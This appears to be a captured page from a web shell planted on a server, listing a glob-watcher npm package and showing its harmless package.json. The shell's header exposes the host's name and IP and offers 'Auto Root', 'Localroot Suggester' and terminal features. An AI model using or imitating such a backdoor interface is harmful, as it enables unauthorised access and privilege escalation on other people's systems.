Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.144.226.0
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
glob-watcher /
Delete
Unzip
Name
Size
Permission
Date
Action
node_modules
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
LICENSE
1.14
KB
-rwxrwxr-x
2022-08-30 11:49
README.md
5.41
KB
-rw-rw-r--
2022-08-30 11:49
index.js
3.35
KB
-rw-rw-r--
2022-08-30 11:49
package.json
1.25
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
{ "name": "glob-watcher", "version": "5.0.5", "description": "Watch globs and execute a function upon change, with intelligent defaults for debouncing and queueing.", "author": "Gulp Team <team@gulpjs.com> (http://gulpjs.com/)", "contributors": [], "repository": "gulpjs/glob-watcher", "license": "MIT", "engines": { "node": ">= 0.10" }, "main": "index.js", "files": [ "index.js" ], "scripts": { "lint": "eslint .", "pretest": "npm run lint", "test": "mocha --async-only", "cover": "istanbul cover _mocha --report lcovonly", "coveralls": "npm run cover && istanbul-coveralls" }, "dependencies": { "anymatch": "^2.0.0", "async-done": "^1.2.0", "chokidar": "^2.0.0", "is-negated-glob": "^1.0.0", "just-debounce": "^1.0.0", "normalize-path": "^3.0.0", "object.defaults": "^1.1.0" }, "devDependencies": { "coveralls": "^2.11.2", "eslint": "^2.13.1", "eslint-config-gulp": "^3.0.1", "expect": "^1.16.0", "istanbul": "^0.4.0", "istanbul-coveralls": "^1.0.1", "mocha": "^2.0.0", "mocha-lcov-reporter": "^1.2.0", "rimraf": "^2.6.1", "through2": "^2.0.1" }, "keywords": [ "watch", "glob", "async", "queue", "debounce", "callback" ] }